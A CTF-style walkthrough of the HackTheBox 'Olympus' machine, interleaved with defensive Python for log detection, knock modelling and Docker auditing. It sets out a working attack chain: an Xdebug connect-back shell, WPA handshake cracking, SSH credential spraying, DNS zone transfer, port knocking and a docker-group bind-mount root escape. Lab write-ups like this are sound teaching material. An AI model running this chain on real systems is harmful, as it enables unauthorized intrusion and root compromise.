Olympus is a CTF-like box. It starts with exploiting the Xdebug PHP extension behind Apache, driven purely over HTTP, which gives you a shell inside a container. You then pivot through other containers while exploring techniques such as 802.11 Wi-Fi handshake cracking, DNS zone transfer and port knocking, which eventually lands you on the actual host. Finally you gain root through the Docker group privileges given to the user.
Enumeration
Masscan + Nmap
```
$ masscan -p1-65535,U:1-65535 `IP` --rate=5000 -e tun0 | tee masscan.out
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 53/udp on 10.10.10.83
Discovered open port 53/tcp on 10.10.10.83
Discovered open port 80/tcp on 10.10.10.83
Discovered open port 2222/tcp on 10.10.10.83
```
Feed those ports to nmap:
```
$ ports=$(cat masscan.out |awk '{ print $4 }' | sed 's/\/tcp//;s/\/udp//' | tr '\n' ',' | sed 's/,$//')
$ nmap -v -sVC --min-rate 1000 -p $ports `IP` -oN nmap-fullscan.out
PORT STATE SERVICE VERSION
53/tcp open domain (unknown banner: Bind)
| dns-nsid:
|_ bind.version: Bind
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ Bind
80/tcp open http Apache httpd
|_http-favicon: Unknown favicon MD5: 399EAE2564C19BD20E855CDB3C0C9D1B
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Crete island - Olympus HTB
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-City of olympia
| ssh-hostkey:
| 2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
|_ 256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)
```
DNS is listening on both TCP and UDP. I enumerated it and got nothing.
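The awk/sed pipeline above strips the `/tcp` and `/udp` suffixes, so the 53/udp hit is folded into the TCP list and nmap never re-scans UDP. As an added example (not the write-up's own pipeline), here is a small parser that keeps the two protocols apart and emits nmap's `T:`/`U:` port syntax; the masscan output it reads is a constructed sample mirroring the hits on this box.

```python
"""Parse masscan's "Discovered open port" lines into an nmap -p spec
that keeps TCP and UDP ports separate (added example, not the author's)."""
import re

# Constructed sample of masscan output, mirroring the write-up's hits.
SAMPLE_MASSCAN_OUT = """\
Discovered open port 53/udp on 10.10.10.83
Discovered open port 53/tcp on 10.10.10.83
Discovered open port 80/tcp on 10.10.10.83
Discovered open port 2222/tcp on 10.10.10.83
"""

LINE_RE = re.compile(
    r"^Discovered open port (?P<port>\d{1,5})/(?P<proto>tcp|udp) on (?P<host>\S+)"
)


def parse_masscan(text):
    """Return {host: {"tcp": [sorted ports], "udp": [sorted ports]}}."""
    hosts = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # banners, status lines, blank lines
        port = int(m.group("port"))
        if not 1 <= port <= 65535:
            continue
        entry = hosts.setdefault(m.group("host"), {"tcp": set(), "udp": set()})
        entry[m.group("proto")].add(port)
    return {h: {p: sorted(v) for p, v in protos.items()} for h, protos in hosts.items()}


def nmap_port_spec(ports):
    """Build an nmap -p argument such as 'T:53,80,2222,U:53'.

    nmap only probes the U: part when -sU is also given, so the caller
    must add -sU whenever the UDP list is non-empty.
    """
    parts = []
    if ports["tcp"]:
        parts.append("T:" + ",".join(str(p) for p in ports["tcp"]))
    if ports["udp"]:
        parts.append("U:" + ",".join(str(p) for p in ports["udp"]))
    return ",".join(parts)


def nmap_command(host, ports):
    """Assemble the follow-up nmap command line for one host."""
    scan_types = "-sS" + ("U" if ports["udp"] else "")  # -sSU when UDP hits exist
    return f"nmap -v {scan_types} -sVC -p {nmap_port_spec(ports)} {host}"


if __name__ == "__main__":
    for host, ports in parse_masscan(SAMPLE_MASSCAN_OUT).items():
        print(nmap_command(host, ports))
```

Running it against the sample prints `nmap -v -sSU -sVC -p T:53,80,2222,U:53 10.10.10.83`; the combined `-sSU` is what makes nmap actually service-probe the UDP side that the original one-liner silently drops.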
HTTP Port 80
Directory fuzzing with ffuf turned up nothing of interest:
```
$ ffuf -u http://10.10.10.83/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fc 401,403,405 -e .php,.html,.txt,.zip,.bak -t 500
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.10.83/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .php .html .txt .zip .bak
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 500
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 401,403,405
________________________________________________
index.php [Status: 200, Size: 314, Words: 16, Lines: 12]
```
index.php shows an image. The page source does not reference the image directly but a CSS file, and that file contains the image path /zeus.jpg. I checked the exif data, ran strings on the image, tried extracting from it with steghide (no password) and looked for embedded files with binwalk. Got nothing.
Let’s check what the service is running on:
```
$ whatweb http://10.10.10.83
http://10.10.10.83 [200 OK] Apache, Country[RESERVED][ZZ], HTML5, HTTPServer[Apache], IP[10.10.10.83], Title[Crete island - Olympus HTB], UncommonHeaders[x-content-type-options,xdebug], X-Frame-Options[sameorigin], X-XSS-Protection[1; mode=block]
```
It shows the server is running Apache. More interesting, it lists uncommon headers: x-content-type-options and xdebug. I can confirm those with curl, which shows the Xdebug version as 2.5.5:
```
$ curl -I http://10.10.10.83
HTTP/1.1 200 OK
Date: Thu, 05 Aug 2021 13:04:41 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Xdebug: 2.5.5
Content-Type: text/html; charset=UTF-8
```
Xdebug 2.5.5
The name is easy to confuse with the XDebug plugin for Apache Traffic Server, which allows HTTP clients to debug the operation of the Traffic Server cache using the default X-Debug header; the header here, however, comes from the Xdebug PHP extension, a remote debugger for PHP, and that is what the exploits below target. If I google xdebug exploitation or Xdebug 2.5.5 exploit:
```
root@TheCaretaker:~$ googler Xdebug 2.5.5 exploit
1. xdebug < 2.5.5 - OS Command Execution ... - Exploit-DB
https://www.exploit-db.com/exploits/44568
02-May-2018 —
2. xdebug Unauthenticated OS Command Execution - Rapid7
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
14-Jun-2018 —
3. nqxcode/xdebug-exploit: OS Command Execution - GitHub
https://github.com/nqxcode/xdebug-exploit
23-Aug-2018 —
```
There are indeed public exploits for Xdebug 2.5.5. The exploit-db entry is the Metasploit module; its description says it exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below, which allows the attacker to execute arbitrary PHP code in the context of the web user.
Let’s narrow the search to GitHub repos:
```
root@TheCaretaker:~/HTB/Olympus$ googler 'Xdebug 2.5.5 exploit site:github.com -htb'
1. nqxcode/xdebug-exploit: OS Command Execution - GitHub
https://github.com/nqxcode/xdebug-exploit
23-Aug-2018 —
2. metasploit-framework/xdebug_unauth_exec.md at master ...
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md
Xdebug is an actively-maintained PHP debugging tool that supports remote ... This module exploits an unauthenticated vulnerability that allows for the ...
3. xdebug-exploit/attack-scenario.md at master · nqxcode ...
https://github.com/nqxcode/xdebug-exploit/blob/master/attack-scenario.md
OS Command Execution. Contribute to nqxcode/xdebug-exploit development by creating an account on GitHub.
4. metasploit-framework/xdebug_unauth_exec.rb at master ...
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/http/xdebug_unauth_exec.rb
class MetasploitModule < Msf::Exploit::Remote ... Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
5. gteissier/xdebug-shell: xdebug reverse shell - GitHub
https://github.com/gteissier/xdebug-shell
What is xdebug ? Xdebug is a php extension that allows to debug php pages, remotely by using DGBp protocol. Code repository is located at xdebug. Code execution ...
googler (? for help) o 1-5
```
The fifth link (gteissier/xdebug-shell) looked promising, and it worked:
```
./xdebug-shell.py --local-host=10.10.14.32 --url=http://10.10.10.83/index.php
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls -l
total 116
-rw-r--r-- 1 root root 137 Apr 7 2018 crete.css
-rw-r--r-- 1 root root 67646 Apr 5 2018 favicon.ico
-rw-r--r-- 1 root root 362 Apr 15 2018 index.php
-rw-r--r-- 1 root root 37144 Apr 6 2018 zeus.jpg
```
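From the defender's side, the thing that makes this class of exploit work is Xdebug being shipped in production with remote debugging enabled: a request carrying the documented XDEBUG_SESSION_START trigger makes the extension open a DBGp connection back toward the requester when xdebug.remote_connect_back is on. The fix is to not load Xdebug on production hosts (or at least disable remote_connect_back), and the trigger is visible in the access log. The following is an added detection example, not code from the write-up or from any of the linked tools; the log lines are constructed in Apache combined format and the allow-list parameter is my assumption. It only sees the query-string form of the trigger, since the cookie form is not in a default access log.

```python
"""Flag requests that carry the Xdebug remote-debug trigger
(added example; constructed log lines)."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines for illustration.
SAMPLE_ACCESS_LOG = """\
10.10.14.32 - - [05/Aug/2021:13:07:12 +0000] "GET /index.php?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 314 "-" "python-requests/2.25.1"
10.10.14.40 - - [05/Aug/2021:13:07:20 +0000] "GET /zeus.jpg HTTP/1.1" 200 37144 "http://10.10.10.83/" "Mozilla/5.0"
10.10.14.32 - - [05/Aug/2021:13:07:25 +0000] "GET /index.php HTTP/1.1" 200 314 "-" "python-requests/2.25.1"
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Query-string keys Xdebug 2.x reacts to (session start, profiler, tracer).
TRIGGER_KEYS = {"XDEBUG_SESSION_START", "XDEBUG_SESSION", "XDEBUG_PROFILE", "XDEBUG_TRACE"}


def parse_clf(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = CLF_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def xdebug_trigger(target):
    """Return the Xdebug trigger key present in a request target, or None."""
    query = urlsplit(target).query
    for key in parse_qs(query, keep_blank_values=True):
        if key.upper() in TRIGGER_KEYS:
            return key.upper()
    return None


def find_xdebug_triggers(log_text, allowed_ips=frozenset()):
    """Return (client_ip, timestamp, trigger) for every request carrying a
    trigger from a client that is not on the developer allow-list (assumed)."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        trig = xdebug_trigger(rec["target"])
        if trig and rec["ip"] not in allowed_ips:
            hits.append((rec["ip"], rec["ts"], trig))
    return hits


if __name__ == "__main__":
    for ip, ts, trig in find_xdebug_triggers(SAMPLE_ACCESS_LOG):
        print(f"{ts}: {trig} requested by {ip}")
```

On the sample it reports the single request from 10.10.14.32 that carried XDEBUG_SESSION_START; the same client's plain GET and the other visitor's image fetch are ignored.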
This isn’t a stable shell, so I spawned a reverse shell, which is at least better. There is no user.txt flag here, and checking the IP address suggests I’m in a container:
```
www-data@f00ba96171c5:/var/www/html$ ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:ac:14:00:02
inet addr:172.20.0.2 Bcast:172.20.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:102 errors:0 dropped:0 overruns:0 frame:0
TX packets:88 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:9161 (8.9 KiB) TX bytes:20674 (20.1 KiB)
```
There is one user named zeus, and his home directory contains some files in an airgeddon directory:
```
www-data@f00ba96171c5:/home/zeus/airgeddon/captured$ ls
captured.cap
papyrus.txt
```
airgeddon dump
captured.cap is a packet capture taken while airgeddon was running against the network. It contains a WPA handshake, which I can crack with aircrack-ng:
```
$ aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt
Reading packets, please wait...
Opening captured.cap
Read 6498 packets.
# BSSID ESSID Encryption
1 F4:EC:38:AB:A8:A9 Too_cl0se_to_th3_Sun WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening captured.cap
Read 6498 packets.
Aircrack-ng 1.6
[00:00:00] 59/10303723 keys tested (1386.58 k/s)
Time left: 2 hours, 3 minutes, 51 seconds 0.00%
KEY FOUND! [ flightoficarus ]
Master Key : FA C9 FB 75 B7 7E DC 86 CC C0 D5 38 88 75 B8 5A
88 3B 75 31 D9 C3 23 C8 68 3C DB FA 0F 67 3F 48
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : AC 1A 73 84 FB BF 75 9C 86 CF 5B 5A F4 8A 4C 38
```
I created a list of candidate usernames and passwords and sprayed them against the SSH login with crackmapexec:
```
prometheus
hades
zeus
icarus
Too_cl0se_to_th3_Sun
flightoficarus
```
icarus:Too_cl0se_to_th3_Sun succeeds:
```
crackmapexec ssh 10.10.10.83 --port 2222 -u users -p users
SSH 10.10.10.83 2222 10.10.10.83 [*] SSH-2.0-City of olympia
SSH 10.10.10.83 2222 10.10.10.83 [-] hades:Too_cl0se_to_th3_Sun Authentication failed.
SSH 10.10.10.83 2222 10.10.10.83 [-] hades:flightoficarus Authentication failed.
SSH 10.10.10.83 2222 10.10.10.83 [-] icarus:zeus Authentication failed.
SSH 10.10.10.83 2222 10.10.10.83 [-] icarus:poseidon Authentication failed.
SSH 10.10.10.83 2222 10.10.10.83 [-] icarus:prometheus Authentication failed.
SSH 10.10.10.83 2222 10.10.10.83 [-] icarus:hades Authentication failed.
SSH 10.10.10.83 2222 10.10.10.83 [-] icarus:icarus Authentication failed.
SSH 10.10.10.83 2222 10.10.10.83 [+] icarus:Too_cl0se_to_th3_Sun
```
And I can SSH in as icarus:
```
$ ssh -p 2222 icarus@10.10.10.83
icarus@10.10.10.83's password:
Last login: Sun Apr 15 16:44:40 2018 from 10.10.14.4
icarus@620b296204a3:~$
```
DNS Zone-Transfer
But this one is also a Docker container, and there’s only one file in the home directory:
```
icarus@620b296204a3:~$ cat help_of_the_gods.txt
Athena goddess will guide you through the dark...
Way to Rhodes...
ctfolympus.htb
```
So I added 10.10.10.83 ctfolympus.htb to my /etc/hosts file and enumerated DNS again. Since the DNS server is also listening on TCP, I can try a zone transfer:
```
$ dig axfr ctfolympus.htb @10.10.10.83
; <<>> DiG 9.16.15-Debian <<>> axfr ctfolympus.htb @10.10.10.83
;; global options: +cmd
ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
ctfolympus.htb. 86400 IN TXT "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
ctfolympus.htb. 86400 IN A 192.168.0.120
ctfolympus.htb. 86400 IN NS ns1.ctfolympus.htb.
ctfolympus.htb. 86400 IN NS ns2.ctfolympus.htb.
ctfolympus.htb. 86400 IN MX 10 mail.ctfolympus.htb.
crete.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
hades.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
mail.ctfolympus.htb. 86400 IN A 192.168.0.120
ns1.ctfolympus.htb. 86400 IN A 192.168.0.120
ns2.ctfolympus.htb. 86400 IN A 192.168.0.120
rhodes.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
RhodesColossus.ctfolympus.htb. 86400 IN TXT "Here lies the great Colossus of Rhodes"
www.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
;; Query time: 84 msec
;; SERVER: 10.10.10.83#53(10.10.10.83)
;; WHEN: Fri Aug 06 11:49:19 IST 2021
```
Earlier the hint said “Way to Rhodes”, and dig shows “Here lies the great Colossus of Rhodes”. I tried accessing the other hosts, crete.ctfolympus.htb, hades.ctfolympus.htb, rhodes.ctfolympus.htb and RhodesColossus.ctfolympus.htb, but none of them served anything different over HTTP. The TXT record, however, says "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
I tried to make sense of the numbers “3456 8234 62431”. They could be port numbers, since all are below 65535. Checking whether those ports are open shows they aren’t:
```
$ nmap -p 3456,8234,62431 ctfolympus.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-06 12:35 IST
Nmap scan report for ctfolympus.htb (10.10.10.83)
Host is up (0.085s latency).
PORT STATE SERVICE
3456/tcp closed vat
8234/tcp closed unknown
62431/tcp closed unknown
```
“Open a temporal portal” using these closed ports hints at port knocking.
Port knocking
I’m using the knock client for port knocking, which is available here:
```
$ knock ctfolympus.htb 3456 8234 62431; nmap ctfolympus.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-06 12:55 IST
Nmap scan report for ctfolympus.htb (10.10.10.83)
Host is up (0.095s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
2222/tcp open EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 1.97 seconds
```
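To see why the three ports report closed to a scanner yet still "open a portal", here is a small model of the server side of port knocking. It is an added example, not the box's actual knockd configuration (which the write-up never shows); it assumes a knockd-style rule in which the exact sequence 3456, 8234, 62431 from one source within a short window opens port 22 for that source, and it consumes connection attempts as (timestamp, source IP, destination port) tuples such as a firewall log of SYNs to closed ports would provide.

```python
"""Knockd-style sequence matcher (added example; assumed rule, not the
box's real configuration)."""
from collections import defaultdict

KNOCK_SEQUENCE = (3456, 8234, 62431)  # the numbers from the TXT record
SEQ_TIMEOUT = 5.0                     # seconds allowed for the whole sequence
OPENED_PORT = 22                       # what the sequence unlocks (assumed)


class KnockDaemon:
    def __init__(self, sequence=KNOCK_SEQUENCE, timeout=SEQ_TIMEOUT):
        self.sequence = tuple(sequence)
        self.timeout = timeout
        # per-source progress: (index of the next expected port, time of first knock)
        self.progress = defaultdict(lambda: (0, None))
        self.opened_for = set()

    def observe(self, ts, src_ip, dst_port):
        """Feed one connection attempt; return True when the sequence completes."""
        idx, started = self.progress[src_ip]
        # A stale partial sequence is discarded, like knockd's seq_timeout.
        if started is not None and ts - started > self.timeout:
            idx, started = 0, None
        if dst_port != self.sequence[idx]:
            # Wrong port (e.g. a scanner hitting the ports out of order) resets;
            # the wrong knock may itself begin a fresh sequence if it is port one.
            self.progress[src_ip] = (1, ts) if dst_port == self.sequence[0] else (0, None)
            return False
        idx += 1
        if started is None:
            started = ts
        if idx == len(self.sequence):
            self.opened_for.add(src_ip)
            self.progress[src_ip] = (0, None)
            return True
        self.progress[src_ip] = (idx, started)
        return False

    def is_open(self, src_ip, dst_port):
        """Would the firewall accept src_ip on dst_port right now?"""
        return dst_port == OPENED_PORT and src_ip in self.opened_for


if __name__ == "__main__":
    d = KnockDaemon()
    for t, port in [(0.0, 3456), (0.5, 8234), (1.0, 62431)]:
        print(f"t={t}: knock {port} -> {'portal open' if d.observe(t, '10.10.14.32', port) else 'waiting'}")
    print("22 open for 10.10.14.32:", d.is_open("10.10.14.32", 22))
```

The model captures the two properties the write-up relies on: a scan that touches the ports out of order, or too slowly, never completes the sequence (so nmap keeps reporting them closed), while the ordered knock from one source opens 22 only for that source, which is why the later ssh is chained directly behind a fresh knock.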
Now there’s a new SSH port, 22. I’ll try prometheus:St34l_th3_F1re!, the credentials from the zone transfer:
```
$ knock ctfolympus.htb 3456 8234 62431; ssh prometheus@ctfolympus.htb
The authenticity of host 'ctfolympus.htb (10.10.10.83)' can't be established.
ECDSA key fingerprint is SHA256:8TR2+AWSBT/c5mrjpDotoEYu0mEy/jCzpuS79d+Z0oY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'ctfolympus.htb,10.10.10.83' (ECDSA) to the list of known hosts.
prometheus@ctfolympus.htb's password:
Welcome to
) (
( /( ) )\ ) (
)\()) ( /( (()/( ))\ (
((_)\ )(_)) ((_))/((_))\
| |(_)((_)_ _| |(_)) ((_)
| ' \ / _` |/ _` |/ -_)(_-<
|_||_|\__,_|\__,_|\___|/__/
prometheus@olympus:~$ ls
msg_of_gods.txt user.txt
```
Checking the IP address confirms this one is the host:
```
$ ip addr
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:50:56:b9:61:d5 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.83/24 brd 10.10.10.255 scope global enp0s3
valid_lft forever preferred_lft forever
```
Privesc via docker
Checking which groups prometheus is in, the list includes docker:
```
prometheus@olympus:~$ id
uid=1000(prometheus) gid=1000(prometheus) groups=1000(prometheus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),111(bluetooth),999(docker)
```
I can list the containers running:
```
prometheus@olympus:~$ docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f00ba96171c5 crete "docker-php-entrypoi…" 3 years ago Up 14 hours 0.0.0.0:80->80/tcp crete
ce2ecb56a96e rodhes "/etc/bind/entrypoin…" 3 years ago Up 14 hours 0.0.0.0:53->53/tcp, 0.0.0.0:53->53/udp rhodes
620b296204a3 olympia "/usr/sbin/sshd -D" 3 years ago Up 14 hours 0.0.0.0:2222->22/tcp olympia
```
Membership of the docker group means I can talk to the Docker daemon, which runs as root, so I can start any container with the host’s root filesystem bind-mounted at /mnt and read it from inside:
```
prometheus@olympus:~$ docker run -v /:/mnt -i -t crete bash
root@98b9021fd1b8:/home/zeus/airgeddon# cat /mnt/root/root.txt
aba486990e2e849e25c23f6e41e5e303
```
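The lesson for defenders is that the docker group is root-equivalent: the daemon will happily bind-mount / into a container for anyone who can reach its socket, so group membership should be treated like sudo access (or replaced with rootless Docker). Such an escape does leave a trace, though: the container created by `docker run -v /:/mnt` shows up in `docker inspect` with a bind mount whose source is the host root. The following is an added audit example, not code from the write-up or from Docker; it parses the JSON that `docker inspect $(docker ps -aq)` prints and flags privileged containers and bind mounts of sensitive host paths. The JSON below is a constructed sample shaped like real output, and the container name hopeful_zeus is made up.

```python
"""Audit docker inspect output for containers that expose the host
(added example; constructed sample JSON)."""
import json

# Host paths that should never be bind-mounted into an untrusted container.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/run/docker.sock", "/proc", "/sys")

# Constructed sample: one benign long-running container plus the escape container.
SAMPLE_INSPECT = json.dumps([
    {"Id": "f00ba96171c5", "Name": "/crete",
     "HostConfig": {"Privileged": False, "Binds": None},
     "Mounts": []},
    {"Id": "98b9021fd1b8", "Name": "/hopeful_zeus",
     "HostConfig": {"Privileged": False, "Binds": ["/:/mnt"]},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt", "RW": True}]},
])


def host_path_is_sensitive(path):
    """True if a bind source is / itself or lies under a sensitive host directory."""
    path = path.rstrip("/") or "/"
    for sensitive in SENSITIVE_HOST_PATHS:
        s = sensitive.rstrip("/") or "/"
        if path == s or (s != "/" and path.startswith(s + "/")):
            return True
    return False


def audit_containers(inspect_json):
    """Return a list of (container name, reason) findings from docker inspect JSON."""
    findings = []
    for c in json.loads(inspect_json):
        name = c.get("Name", c.get("Id", "?")).lstrip("/")
        host_config = c.get("HostConfig") or {}
        if host_config.get("Privileged"):
            findings.append((name, "privileged container"))
        for m in c.get("Mounts") or []:
            if m.get("Type") == "bind" and host_path_is_sensitive(m.get("Source", "")):
                mode = "rw" if m.get("RW", True) else "ro"
                findings.append(
                    (name, f"bind mount of host {m['Source']} at {m['Destination']} ({mode})")
                )
    return findings


if __name__ == "__main__":
    for name, reason in audit_containers(SAMPLE_INSPECT):
        print(f"[!] {name}: {reason}")
```

On a live host you would feed it `docker inspect $(docker ps -aq)` (stopped containers included, since the escape container exits as soon as the shell does); the mount check also catches the Docker socket itself being mounted, which gives the same root-equivalent access by a different route.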